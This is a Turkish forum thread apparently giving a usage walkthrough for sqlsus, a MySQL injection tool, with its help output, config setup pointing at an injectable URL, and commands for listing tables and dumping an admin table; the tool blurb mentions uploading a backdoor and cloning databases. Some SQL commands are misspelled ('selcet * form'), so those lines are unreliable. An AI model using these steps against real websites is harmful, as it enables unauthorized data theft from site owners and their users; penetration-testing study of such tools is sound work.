İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

SqlSus Kullanımı

06-01-2019 21:31
#1
Üyelik tarihi:
07/2017
Yaş:
98
Mesajlar:
1.170
Teşekkür (Etti):
105
Teşekkür (Aldı):
166
Konular:
290
---SQLSUS HAKKINDA---
Sqlsus perl dili ile yazılımış açık kaynak kodlu MySQL enjeksiyon aracıdır .
veritabanı yapısını alabilir, kendi SQL sorgularınızı (hatta karmaşık olanlar) enjekte edebilir, web sunucusundan dosya indirebilir, yazılabilir dizinler için web sitesini tarayabilir, bir arka kapı yükleyebilir ve kontrol edebilir, veritabanını klonlayabilirsiniz ve daha fazlasını bile yapa bilirsiniz.

sqlsus, hız ve verimliliğe odaklanır, mevcut enjeksiyon alanını optimize eder, MySQL işlevlerinden en iyi şekilde yararlanır .
----
---SQLSUS---
Kod:
root@kali:~# sqlsus -h

              sqlsus version 0.7.2

  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

Usage:
    sqlsus [options] [config file]

     Options:
         -h, --help                    brief help message
         -v, --version                 version information
         -e, --execute <commands>      execute commands and exit
         -g, --genconf <filename>      generate configuration file
Örnek kullanım
Kod:
root@kali:~# sqlsus -g sqlsus.cfg

              sqlsus version 0.7.2

  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

[+] Configuration successfully saved to sqlsus.cfg
root@kali:~# nano sqlsus.cfg
Kod:
root@kali:~# sqlsus sqlsus.cfg

              sqlsus version 0.7.2

  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

[+] Session "192.168.1.25" created
sqlsus> start
Video çekicektim ancak site bulamadım mlsf ....
Buradan anlatayım ..

sqlsus -g sqlsus.cfg komutu ile sqlsus.cfg dosyası oluşturuyoruz oluşturuduğumuz dosyanın içine girelim.

Kod:
our $url_start = "";
Böyle bir yazı görüceksinizdir .($url_start="") yerine hedef url yi giriyoruz ve kayıt ediyoruz.
Kod:
our $url_start = "http://localhost/script.php?id=1'";
Uçbirim'e(terminal'a)
Kod:
sqlsus /dosyanın_bulundu_dizin_/DOSYA.cfg
Çıktı:
Kod:
              sqlsus version 0.7.2

  Copyright (c) 2008-2011 Jérémy Ruffet (sativouf)

start[+] Session "www.sedimental.com" created
sqlsus> start
sqlsus> olan yere star' diyoruz veri tabanlarını çekmiş oluyorsunuz bu sayede ondan sonrası sizde artık

get tables -> Tablolara erişim sağlar.
get colums -> Stünlara erişim sağlar.
selcet * form Colum -> Seçilen sütündan(colum)veri çekmeye sağlar.
Kod:
selcet * form admin
Konu ByKertenkele tarafından (06-01-2019 22:24 Saat 22:24 ) değiştirilmiştir.

17-01-2019 16:16
#2
whoishe - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2019
Mesajlar:
24
Teşekkür (Etti):
14
Teşekkür (Aldı):
4
Konular:
6
selcet * form Colum

bi an yanlış sandım
ByKertenkele Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı